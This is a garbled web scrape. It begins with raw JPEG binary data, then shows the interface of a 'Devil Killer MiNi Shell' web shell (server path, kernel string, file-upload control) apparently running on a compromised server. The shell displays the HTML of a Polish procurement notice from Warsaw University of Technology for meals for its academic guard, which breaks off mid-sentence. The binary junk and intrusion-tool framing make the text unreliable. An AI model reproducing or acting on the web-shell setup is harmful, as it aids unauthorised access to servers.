JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211123/0027937701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i sukcesywne dostawy posiłków profilaktycznych dla Straży Akademickiej PW w okresie zimowym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLITECHNIKA WARSZAWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">PLAC POLITECHNIKI 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-661</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48222345324</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">Ewa.Szafranska@pw.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pw.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i sukcesywne dostawy posiłków profilaktycznych dla Straży Akademickiej PW w okresie zimowym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ff1bec2-486d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00279377</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określono<br/>w Rozdziale 8 SWZ. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl. Zamawiający będzie przekazywał Wykonawcom informacje za<br/>pośrednictwem platformazakupowa.pl. Wymagania Zamawiającego dotyczące specyfikacji połączenia,<br/>formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za<br/>pośrednictwem platformazakupowa.pl : stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa;<br/>Uwaga! od dnia 17 sierpnia 2021,ze względu na zakończenie wspierania przeglądarki Internet Explorer<br/>przez firmę Microsoft, stosowanie przeglądarki Internet Explorer nie będzie dopuszczalne, włączona<br/>obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików<br/>.pdf, Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8, Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określono w Rozdziale 19 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.D.SE.25.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest : Zakup i sukcesywne dostawy posiłków profilaktycznych dla<br/>Straży Akademickiej PW w okresie zimowym. Szczegółowy opis przedmiotu zamówienia<br/>znajduje się w :<br/>Załączniku nr 2 do SWZ Formularz asortymentowo- cenowy,<br/>Załączniku nr 3 do SWZ Szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji: w ramach przedmiotu umowy Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej:<br/>1) Zamawiający może z opisanego w niniejszej umowie prawa opcji skorzystać lub skorzystać w części;<br/>2) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego;<br/>3) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego liczbę zestawów w ramach przedmiotowego uprawnienia Zamawiającego;<br/>4) Termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż 3 dni od dnia przesłania zawiadomienia do Wykonawcy;<br/>5) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamawiający zastrzega również, że ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy;<br/>6) Przedmiot umowy w zakresie przysługującego Zamawiającemu prawa opcji może obejmować dostawę w maksymalnej liczbie opisanej w SWZ;<br/>7) Zamawiający zastrzega, ze ilość przewidziana w ramach prawa opcji jest wielkością maksymalną, a ilości te mogą ulec zmniejszeniu o nie więcej niż 25 % w zależności od potrzeb Zamawiającego w trakcie trwania umowy;<br/>8) Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do 4 miesięcy, licząc od dnia podpisania umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określono w Rozdziale 14 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zawartość soli na 100 g produktu gotowego – dotyczy pozycji 1-8 Załącznika nr 2 do SWZ Formularz asortymentowo - cenowy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zawartość cukru na 100 g produktu gotowego – dotyczy pozycji 1-8 Załącznika nr 2 do SWZ Formularz asortymentowo - cenowy.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 1 a do formularza oferty. Informacje zawarte w oświadczeniu, o którym<br/>mowa w pkt 1. stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>2. Wypełniony szczegółowymi danymi i podpisany Załącznik nr 2 do SWZ Formularz asortymentowo - cenowy.<br/>3. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z<br/>Załącznikiem nr 1c do formularza oferty;<br/>4. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, wystawione nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów. W przypadku wskazania przez wykonawcę dostępności podmiotowych<br/>środków dowodowych lub dokumentów, o których mowa w pkt 4., pod określonymi adresami<br/>internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający może żądać od wykonawcy<br/>przedstawienia tłumaczenia na język polski pobranych samodzielnie przez zamawiającego<br/>podmiotowych środków dowodowych lub dokumentów. 5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o których mowa w pkt 4 – składa dokument lub dokumenty wystawione w kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie<br/>otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie<br/>zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się<br/>on winnej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 5, lub gdy dokumenty te nie odnoszą się do<br/>wszystkich przypadków, o których mowa w art. 108 ust.1 pkt 1, 2 i 4, zastępuje się je odpowiednio w<br/>całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której<br/>dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego,<br/>właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokumenty o których mowa<br/>w pkt 4 i 5 powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe:<br/>1. na potwierdzenie, że oferowane usługi / dostawy spełniają określone przez Zamawiającego<br/>wymagania Wykonawca ma obowiązek dołączyć do oferty, wypełniony szczegółowymi danymi i<br/>podpisany Załącznik nr 2 do SWZ Formularz asortymentowo – cenowy,<br/>2. Zamawiający akceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzają, że<br/>oferowane dostawy i usługi spełniają określone przez Zamawiającego wymagania<br/>wyszczególnione w Załączniku nr 2 do SWZ Formularz asortymentowo – cenowy i Załączniku nr<br/>3 do SWZ Szczegółowy opis przedmiotu zamówienia.<br/>3. W przypadku gdy Wykonawca proponuje rozwiązania równoważne, Zamawiający wymaga<br/>dostarczenia wraz z ofertą po 1 sztuce oferowanych produktów z pozycji 1 – 8 Załącznika nr 2 do<br/>SWZ Formularz asortymentowo – cenowy, w celu dokonania oceny jakości produktów<br/>spożywczych za pomocą zmysłów: wzroku, węchu i smaku, na podstawie oględzin i degustacji.<br/>Wyroby dołączone do oferty celem oceny powyższych walorów jak i późniejsze dostawy muszą<br/>posiadać oryginalne opakowanie, oryginalną fabryczną etykietę producenta zawierającą<br/>informację o nazwie produktu, nazwie producenta, składzie surowcowym, kaloryczności, dacie<br/>produkcji oraz dacie przydatności do spożycia. W ramach oceny organoleptycznej oceniany<br/>będzie smak, zapach, konsystencja, zawartość substancji konserwujących, wygląd zewnętrzny.<br/>Preferencje Zamawiającego w odniesieniu do posiłków: „smak” - bez obcych posmaków,<br/>odpowiadający danemu gatunkowi konserwy/dania, bez nadmiernego użycia soli i przypraw (szczególnie ostrych, zabijających smak), itp. „zapach&#34; - świeżej konserwy/dania, bez obcych<br/>zapachów, wyraźny dla użytych dodatków itp. „konsystencja&#34;-jednolita, zwarta, bez nadmiernego<br/>wypływu wody i tłuszczu, użytych substancji do produkcji wyrobu itp. „wygląd zewnętrzny&#34; - kolor<br/>świeżego mięsa użytego do produkcji, z zabarwieniem charakterystycznym do użytych przypraw<br/>i dodatków.<br/>4. Jeżeli Wykonawca nie spełni minimalnych wymagań zawartych w opisie przedmiotu<br/>zamówienia (Załączniku nr 2 do SWZ Formularz asortymentowo – cenowy i Załączniku nr 3 do<br/>SWZ Szczegółowy opis przedmiotu zamówienia) to jego oferta zostanie odrzucona. Jeśli próbka<br/>nie będzie odpowiadała kryteriom równoważności, oferta zostanie odrzucona.<br/>5. Przedmiotowe środki dowodowe Wykonawcy obowiązani są złożyć do upływu terminu<br/>składania ofert określonego w Rozdziale 12 pkt. 12.1. SWZ i dostarczyć pod adres wskazany w<br/>Rozdziale 1 pkt. 1.5. SWZ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty i oświadczenia składane wraz z ofertą:<br/>1. Wypełniony Formularz ofertowy zgodny ze wzorem stanowiącym załącznik nr 1 do SWZ,<br/>podpisany przez osobę prawidłowo umocowaną.<br/>2. Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile nie wynika<br/>ono z dokumentu rejestracyjnego, określające jego zakres i podpisane przez osoby uprawnione<br/>do reprezentacji Wykonawcy.<br/>3. Wypełniony szczegółowymi danymi i podpisany Załącznik nr 2 do SWZ Formularz<br/>asortymentowo - cenowy.<br/>4. (jeżeli dotyczy) Przedmiotowe środki dowodowe (w przypadku gdy Wykonawca proponuje rozwiązania równoważne) to jest po 1 sztuce oferowanych produktów z pozycji 1 – 8 Załącznika<br/>nr 2 do SWZ Formularz asortymentowo – cenowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Określono w Rozdziale 6 SWZ (6.10. – 6.13.) i Rozdziale 7 SWZ (7.13.1 – 7.13.7) Zamawiający<br/>nie zastrzega obowiązku osobistego wykonania przez Wykonawcę lub przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, kluczowych zadań<br/>wymienionych w art. 60 i art. 121 ustawy Pzp. Zamawiający, zgodnie z art. 462 ust. 2 ustawy<br/>Pzp, żąda wskazania przez Wykonawcę w formularzu oferty części zamówienia, której<br/>wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcę nazw<br/>podwykonawców, jeżeli są już znani. W przypadku braku takiej informacji w treści formularza<br/>oferty Zamawiający uzna, iż Wykonawca wykona zamówienie w całości samodzielnie. Jeżeli<br/>zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca<br/>powoływał się, na zasadach określonych w art.118 ust.1 ustawy Pzp, w celu wykazania<br/>spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać<br/>Zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je<br/>w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w<br/>trakcie postępowania o udzielenie zamówienia. Przepis art.122 ustawy Pzp stosuje się<br/>odpowiednio. Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia<br/>Wykonawcy z odpowiedzialności za należyte wykonanie tego zamówienia. Wykonawcy mogą<br/>wspólnie ubiegać się o udzielenie zamówienia (konsorcjum, spółka cywilna). W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Wraz z ofertą, która powinna zawierać niezbędne<br/>informacje o wszystkich Wykonawcach wchodzących w skład konsorcjum/spółki cywilnej, należy złożyć: pełnomocnictwo pełnomocnika; aktualne na dzień składania ofert oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z<br/>postępowania – zgodnie z Załącznikiem nr 1 a do formularza oferty. Informacje zawarte w<br/>oświadczeniu, o którym mowa w ppkt 7.13.2. lit. b) SWZ stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu: -<br/>Oświadczenie o braku podstaw wykluczenia z postępowania - obowiązkowo składa każdy<br/>Wykonawca, - Oświadczenie o spełnieniu warunków udziału w postępowaniu, winien złożyć co<br/>najmniej jeden z tych z Wykonawców, albo wszyscy ci Wykonawcy wspólnie. Informacje zawarte<br/>w oświadczeniach, wskazanych w pkt 7.13.2 lit. b) SWZ tiret jeden i tiret dwa stanowią 